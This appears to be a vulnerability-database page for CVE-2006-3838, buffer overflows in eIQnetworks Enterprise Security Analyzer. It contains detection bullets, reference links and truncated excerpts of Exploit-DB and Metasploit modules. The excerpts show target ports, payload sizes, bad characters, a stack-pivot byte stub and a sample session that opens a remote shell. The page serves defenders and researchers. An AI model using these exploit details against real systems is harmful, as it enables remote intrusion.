CVE-2006-3838
published 2006-07-27CVE-2006-3838: Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy…
PriorityP269critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
73.15%
99.4th percentile
Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eiqnetworks | enterprise_security_analyzer | <= 2.4.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor TCP port 10616 (License Manager / EnterpriseSecurityAnalyzer.exe) for connections sending oversized LICMGR_ADDLICENSE commands; payload buffer offsets of 494 or 1262 bytes are used in known exploits. ↗
- →Monitor TCP port 10628 (Topology server / Topology.exe) for connections sending oversized DELETEDEVICE commands; a 128-byte alphanumeric filler followed by a return address and NOP sled is the known exploit pattern. ↗
- →Alert on network traffic to port 10616 or 10628 containing the literal strings LICMGR_ADDLICENSE& or DELETEDEVICE& with arguments exceeding normal length bounds. ↗
- →Bad characters for LICMGR_ADDLICENSE exploit payloads are null byte, LF, CR, @, and &; encoded shellcode avoiding these bytes should be flagged in oversized command arguments. ↗
- →Bad characters for DELETEDEVICE exploit payloads are null byte, LF, CR, and space; encoded shellcode avoiding these bytes should be flagged in oversized DELETEDEVICE arguments on port 10628. ↗
- →The DELETEDEVICE exploit prepends a stack-pivot encoder stub (\x81\xc4\xff\xef\xff\xff\x44) before the payload; detect this byte sequence in traffic to port 10628. ↗
- →The LICMGR_ADDLICENSE exploit also prepends the same stack-pivot encoder stub (\x81\xc4\xff\xef\xff\xff\x44); detect this byte sequence in traffic to port 10616. ↗
- →Monitor syslogserver.exe for receipt of oversized DELTAINTERVAL, LOGFOLDER, DELETELOGS, FWASERVER, SYSLOGPUBLICIP, GETFWAIMPORTLOG, GETFWADELTA, DELETERDEPDEVICE, COMPRESSRAWLOGFILE, GETSYSLOGFIREWALLS, ADDPOLICY, or EDITPOLICY commands. ↗
- →Monitor Monitoring.exe for receipt of oversized TRACE or QUERYMONITOR commands. ↗
- ·Exploits were tested only against ESA v2.1.13; return addresses and offsets may differ on other versions or OEM rebrands. ↗
- ·Multiple OEM-rebranded products share the same vulnerable codebase and the same exploit port/command structure; detection rules should cover all branded variants. ↗
- ·Two distinct payload buffer sizes (494 and 1262 bytes) are used depending on the target OEM variant; detection thresholds should account for both. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2006-3838 eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)
eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)
---
##
# $Id: eiqnetworks_esa.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in eIQnetworks
Enterprise Security Analyzer. During the processing of
long arguments to the LICMGR_ADDLICENSE command, a stack-based
buffer overflow occurs. This module has only been tested
against ESA v2.1.13.
},
'Author' => [ '
Exploit-DB
eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2006-3838 eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)
eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)
---
##
# $Id: eiqnetworks_esa_topology.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in eIQnetworks
Enterprise Security Analyzer. During the processing of
long arguments to the DELETEDEVICE command in the Topology
server, a stack-based buffer overflow occurs.
This module has only been tested against ESA v2.1.13.
},
'Author' =>
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)
exploitdb·2006-08-07
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)
---
#!/usr/bin/perl -w
package Msf::Exploit::EiQ_License;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t [email protected] KF [email protected]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 494,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module Exploits a buffer overflow in the LICENCE_MANAGER field of
EiQ networks Enterprise Security Analyzer. This bug
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
exploitdb·2006-07-27
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)
---
#!/usr/bin/perl -w
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by Titon of Bastard Labs.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
#
# Exploit for * Security Analyzer by eiQnetworks (OEM for Several vendors)
#
# kfinisterre@kfinisterre01:~$ ./eiQ_multi.pl 2 192.168.0.13
# *** Target: NetworkSecurityAnalyzerv4.2.27.exe, Len: 1262
# Exploiting 192.168.0.13
# kfinisterre@kfinisterre01:~$ telnet 192.168.0.13 4444
# Trying 192.168.0.13...
# Connected to 192.168.0.13.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Network Security Analyzer\fwa>exit
#
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)
exploitdb·2006-07-26
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)
---
#!/usr/bin/perl -w
#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
package Msf::Exploit::EiQ_License_494;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t [email protected], KF [email protected]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 494,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer
Exploit-DB
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
exploitdb·2006-07-26
CVE-2006-3838 eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
---
#!/usr/bin/perl -w
#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs
package Msf::Exploit::EiQ_License_1262;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'EIQ License Manager Overflow',
'Authors' => [ 'ri0t [email protected], KF [email protected]' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 10616],
},
'Payload' =>
{
'Space' => 1262,
'BadChars' => "\x00\x0a\x0d\x40\x26",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buff
Metasploit
eIQNetworks ESA Topology DELETEDEVICE Overflow
metasploit
eIQNetworks ESA Topology DELETEDEVICE Overflow
eIQNetworks ESA Topology DELETEDEVICE Overflow
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.
Metasploit
eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
metasploit
eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.
No writeups or analysis indexed.
http://archive.cert.uni-stuttgart.de/bugtraq/2006/08/msg00152.htmlhttp://secunia.com/advisories/21211http://secunia.com/advisories/21213http://secunia.com/advisories/21214http://secunia.com/advisories/21215http://secunia.com/advisories/21217http://secunia.com/advisories/21218http://securitytracker.com/id?1016580http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdfhttp://www.kb.cert.org/vuls/id/513068http://www.osvdb.org/27525http://www.osvdb.org/27526http://www.osvdb.org/27527http://www.osvdb.org/27528http://www.securityfocus.com/archive/1/441195/100/0/threadedhttp://www.securityfocus.com/archive/1/441197/100/0/threadedhttp://www.securityfocus.com/archive/1/441198/100/0/threadedhttp://www.securityfocus.com/archive/1/441200/100/0/threadedhttp://www.securityfocus.com/bid/19163http://www.securityfocus.com/bid/19164http://www.securityfocus.com/bid/19165http://www.securityfocus.com/bid/19167http://www.tippingpoint.com/security/advisories/TSRT-06-03.htmlhttp://www.tippingpoint.com/security/advisories/TSRT-06-04.htmlhttp://www.tippingpoint.com/security/advisories/TSRT-06-07.htmlhttp://www.vupen.com/english/advisories/2006/2985http://www.vupen.com/english/advisories/2006/3006http://www.vupen.com/english/advisories/2006/3007http://www.vupen.com/english/advisories/2006/3008http://www.vupen.com/english/advisories/2006/3009http://www.vupen.com/english/advisories/2006/3010http://www.zerodayinitiative.com/advisories/ZDI-06-023.htmlhttp://www.zerodayinitiative.com/advisories/ZDI-06-024.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/27950https://exchange.xforce.ibmcloud.com/vulnerabilities/27951https://exchange.xforce.ibmcloud.com/vulnerabilities/27952https://exchange.xforce.ibmcloud.com/vulnerabilities/27953https://exchange.xforce.ibmcloud.com/vulnerabilities/27954http://archive.cert.uni-stuttgart.de/bugtraq/2006/08/msg00152.htmlhttp://secunia.com/advisories/21211http://secunia.com/advisories/21213http://secunia.com/advisories/21214http://secunia.com/advisories/21215http://secunia.com/advisories/21217http://secunia.com/advisories/21218http://securitytracker.com/id?1016580http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdfhttp://www.kb.cert.org/vuls/id/513068http://www.osvdb.org/27525http://www.osvdb.org/27526http://www.osvdb.org/27527http://www.osvdb.org/27528http://www.securityfocus.com/archive/1/441195/100/0/threadedhttp://www.securityfocus.com/archive/1/441197/100/0/threadedhttp://www.securityfocus.com/archive/1/441198/100/0/threadedhttp://www.securityfocus.com/archive/1/441200/100/0/threadedhttp://www.securityfocus.com/bid/19163http://www.securityfocus.com/bid/19164http://www.securityfocus.com/bid/19165http://www.securityfocus.com/bid/19167http://www.tippingpoint.com/security/advisories/TSRT-06-03.htmlhttp://www.tippingpoint.com/security/advisories/TSRT-06-04.htmlhttp://www.tippingpoint.com/security/advisories/TSRT-06-07.htmlhttp://www.vupen.com/english/advisories/2006/2985http://www.vupen.com/english/advisories/2006/3006http://www.vupen.com/english/advisories/2006/3007http://www.vupen.com/english/advisories/2006/3008http://www.vupen.com/english/advisories/2006/3009http://www.vupen.com/english/advisories/2006/3010http://www.zerodayinitiative.com/advisories/ZDI-06-023.htmlhttp://www.zerodayinitiative.com/advisories/ZDI-06-024.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/27950https://exchange.xforce.ibmcloud.com/vulnerabilities/27951https://exchange.xforce.ibmcloud.com/vulnerabilities/27952https://exchange.xforce.ibmcloud.com/vulnerabilities/27953https://exchange.xforce.ibmcloud.com/vulnerabilities/27954
2006-07-27
Published